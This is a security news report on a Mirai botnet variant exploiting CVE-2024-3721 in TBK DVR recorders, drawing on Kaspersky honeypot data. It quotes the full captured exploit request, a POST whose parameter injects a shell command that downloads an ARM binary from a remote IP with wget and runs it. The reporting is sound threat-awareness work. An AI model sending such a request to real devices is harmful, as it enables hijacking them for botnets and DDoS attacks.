A new variant of the Mirai malware botnet is exploiting a little-known command injection vulnerability in TBK digital video recording devices, specifically models DVR-4104 and DVR-4216, to take control of them. This vulnerability, identified as CVE-2024-3721, was disclosed by security researcher “netsecfish” in April 2024 but has just now been spotted in the wild.
The researcher published a proof-of-concept (PoC) demonstrating how to exploit a vulnerable endpoint by sending a specially crafted POST request. This approach allowed for shell command execution by manipulating specific parameters, namely “mdb” and “mdc.” Kaspersky has now reported detecting active exploitation of CVE-2024-3721 in its Linux honeypots, linked to a new variant of the Mirai botnet that is utilizing netsecfish’s PoC.
Attackers utilize an exploit to deploy an ARM32 malware binary on the target device. This malware establishes communication with a command and control (C2) server, effectively integrating the device into a botnet. Once enlisted, the device is likely used to carry out distributed denial of service (DDoS) attacks, proxy malicious traffic, and perform other harmful activities.
Although netsecfish reported last year that there were approximately 114,000 internet-exposed DVRs vulnerable to CVE-2024-3721, Kaspersky’s scans show approximately 50,000 exposed devices, which is still significant.
According to Kapersky, the malware was discovered during a review of their Linux honeypot system. The POST command looks like this:
"POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"The POST request contains a malicious command that is a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.
The source code of the Mirai botnet was published on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.
